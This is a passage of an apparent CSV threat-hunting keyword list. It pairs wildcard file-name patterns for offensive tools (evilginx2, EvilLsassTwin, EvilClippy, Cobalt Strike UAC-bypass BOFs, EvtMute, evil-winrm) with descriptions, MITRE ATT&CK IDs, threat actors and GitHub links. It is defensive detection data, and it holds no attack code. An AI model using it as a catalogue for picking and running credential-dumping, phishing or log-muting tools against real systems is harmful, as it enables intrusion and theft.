hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*EventAggregation.dll.bak*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*EventAggregation.dll.bak*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*EventAggregation.dll.patched*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*EventAggregationPH.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*eventlog -risk-i-know*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*eventlog_fucker.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*eventspy.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*EventSub-Aggressor.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*EventViewerRCE.ps1*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*EventViewerUAC.*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*EventViewerUAC.*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" +"*EventViewerUAC.x64*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*EventViewerUAC.x86*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*EventViewerUAC_BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" +"*eventvwr_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*evilclippy *","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*EvilClippy.exe*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*EvilClippy.exe*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*EvilClippyManager.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*EvilClippy-master*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*EvilClippyMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*evilfeed.go*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*evilginx*","offensive_tool_keyword","evilginx","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilginx.exe*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilginx2*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilginx-linux*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*evilginx-mastery*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilgophish*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*evilgrade*","offensive_tool_keyword","evilgrade","Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. and has an autoconfiguration when new binary agents are set","T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212","TA0002 - ","N/A","N/A","Frameworks","https://github.com/infobyte/evilgrade","1","0","N/A","N/A","10","1236","288","2021-09-01T17:08:27Z","2013-04-22T16:08:48Z" +"*EvilLsassTwin.exe*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*EvilLsassTwin.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*evilmog/ntlmv1-multi*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*EvilnoVNC-main*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" +"*eviloffice.exe*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*EvilPayload.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*evilqr-main*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" +"*evilqr-phishing*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" +"*evilqr-server*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" +"*evilsocket*","offensive_tool_keyword","Github Username","github username of hacker known for sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/evilsocket","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*EvilTwin.dmp*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*EvilTwinServer.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*evil-winrm -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*evil-winrm*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","1","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*EvtMuteHook.dll*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*EvtMuteHook.dll*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*EvtMuteHook.iobj*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*EvtMuteHook.ipdb*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*EvtMuteHook.pdb*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a 